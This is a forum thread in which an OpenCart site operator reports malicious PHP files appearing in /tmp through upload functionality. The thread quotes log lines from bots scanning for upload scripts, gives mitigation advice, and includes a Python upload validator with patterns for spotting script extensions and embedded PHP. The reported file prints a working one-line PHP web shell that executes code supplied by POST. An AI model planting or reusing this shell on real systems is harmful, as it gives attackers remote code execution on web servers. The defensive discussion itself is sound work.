Post by garyw75 » Wed Aug 14, 2019 4:27 pm

We are a design agency purely running Opencart on our servers. Versions we have installed range from 1.5.6.4 upwards.

Our malware and virus software on the webserver is starting to pick up files in the /tmp folder. The files are in the format of OpenCart sessions, so we believe OpenCart's upload functionality is the source of the file creation.

Overnight we see mainly 1.5.6.4 creating the files but there has been one or two instances of version 3 doing it.

-rw------- 1 website website 1400195 Aug 13 16:26 20190813-162642-XVLWsnW@S2pF81WGLe3uagAAAA0-file-uLQeCe

The files contain malicious code like this:

EEC4D8E4439299046B8CDB3F782<?php @preg_replace("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>[root@host tmp]#

On checking the logs we can see automated crawlers scanning for upload scripts on most of our servers:

[12/Aug/2019:22:28:23 +0100] "POST /chat/upload.php HTTP/1.1" 301 537 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:23 +0100] "POST /Chat/upload.php HTTP/1.1" 301 481 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:23 +0100] "POST /en/upload.php HTTP/1.1" 301 477 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:24 +0100] "POST /chat/FlashChat_v608/chat/upload.php HTTP/1.1" 301 521 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:24 +0100] "POST /radio/radiochat/upload.php HTTP/1.1" 301 503 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:25 +0100] "POST /websci/radio/radiochat/upload.php HTTP/1.1" 301 517 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:25 +0100] "POST /o/BhGCe/forums.e-mpire.com/chat/upload.php HTTP/1.1" 301 561 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
[12/Aug/2019:22:28:26 +0100] "POST /cms/chat/upload.php HTTP/1.1" 301 489 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

They are scanning for vulnerable upload pages in all different types of software. Presumably one of the checks is for OpenCart's upload functionality.

As I have already said, we do not have anything else on the server apart from OpenCart. I have checked CVE Details for any new vulnerabilities but nothing is listed.

Can anyone check if they are experiencing the same thing, or offer any advice?

Thanks very much
Gary


Post by webdesires » Fri Aug 16, 2019 8:23 pm

There is an issue whereby a bot can upload files using the file upload feature on products; what we usually do is disable this code for clients not using products with an upload, to close this potential issue.

However, no one can actually access these files to run the code anyway, so it's not an issue as long as they cannot get into the download folder to run them. There is a potentially more serious issue in OpenCart 1.5 especially, where they could actually run these; I've seen it happen and I'm not 100% sure how they figure that out. But my recommendation would be to just disable the upload code in /catalog/controller/product.php if it's not being used.

Regards, WebDesires.
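Disabling the product upload is the right call when it is unused. Where a shop does need it, the checks below are what a defender wants the handler to do before anything reaches disk: reject script extensions anywhere in the name, accept only an allowlist, cap the size, refuse bodies that contain PHP, and store under a random name in a directory that is not served (or has script execution disabled). This is an added example in Python, not OpenCart's own code; the allowed extensions, size limit and storage layout are assumptions about a reasonable policy.

```python
"""Added example (not OpenCart code): validation a hardened upload handler
performs before storing a client-supplied file. ALLOWED_EXTS, MAX_BYTES and
the storage layout are assumptions."""
import os
import re
import secrets

ALLOWED_EXTS = {'.jpg', '.jpeg', '.png', '.pdf', '.zip'}   # assumption: what a shop accepts
MAX_BYTES = 2 * 1024 * 1024                                 # assumption: 2 MiB cap
# A server-side script segment anywhere in the name: shell.php, photo.php.jpg, x.phtml
SCRIPT_SEGMENT_RE = re.compile(r'\.(php\d?|phtml|phar|pht|cgi|pl|sh)(\.|$)', re.IGNORECASE)
PHP_MARKERS = (b'<?php', b'<?=', b'<script language="php"')


class UploadRejected(ValueError):
    pass


def check_upload(original_name, content):
    """Return (stored_name, None) when the file is acceptable, else (None, reason)."""
    # Strip any path the client sent (either separator style) and NUL tricks
    name = os.path.basename(original_name.replace('\\', '/'))
    if not name or name.startswith('.') or '\x00' in name:
        return None, 'empty, hidden or NUL-containing filename'
    if SCRIPT_SEGMENT_RE.search(name):
        return None, 'script extension in name'
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_EXTS:
        return None, f'extension not allowed: {ext or "(none)"}'
    if len(content) > MAX_BYTES:
        return None, 'file too large'
    if any(marker in content for marker in PHP_MARKERS):
        return None, 'embedded PHP code'
    # The client-chosen name never reaches disk; keep it only as metadata
    # (a database column in a real shop). The stored name is random.
    return secrets.token_hex(16) + ext, None


def store_upload(store_dir, original_name, content):
    """Write an accepted file with owner-only permissions and return its stored name.

    store_dir should sit outside the web root, or be a directory where the web
    server has script execution disabled, so a stored file can never be run."""
    stored, reason = check_upload(original_name, content)
    if stored is None:
        raise UploadRejected(reason)
    path = os.path.join(store_dir, stored)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, 'wb') as fh:
        fh.write(content)
    return stored


if __name__ == '__main__':
    # Constructed inputs: a PNG header and a PHP one-liner of the kind seen in /tmp
    for name, body in [('logo.png', b'\x89PNG\r\n\x1a\n'),
                       ('shell.php', b'<?php echo 1; ?>'),
                       ('photo.php.jpg', b'\xff\xd8\xff'),
                       ('logo.png', b'\x89PNG<?php echo 1; ?>')]:
        print(name, '->', check_upload(name, body))
```

The combination matters: the random stored name defeats a later request for the original filename, the content scan catches a payload hiding behind an image extension, and the non-served directory is the backstop if every other check is wrong.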

Post by johnp » Fri Aug 16, 2019 11:04 pm

Stick crawlprotect or CIDRAM on and it will block that.
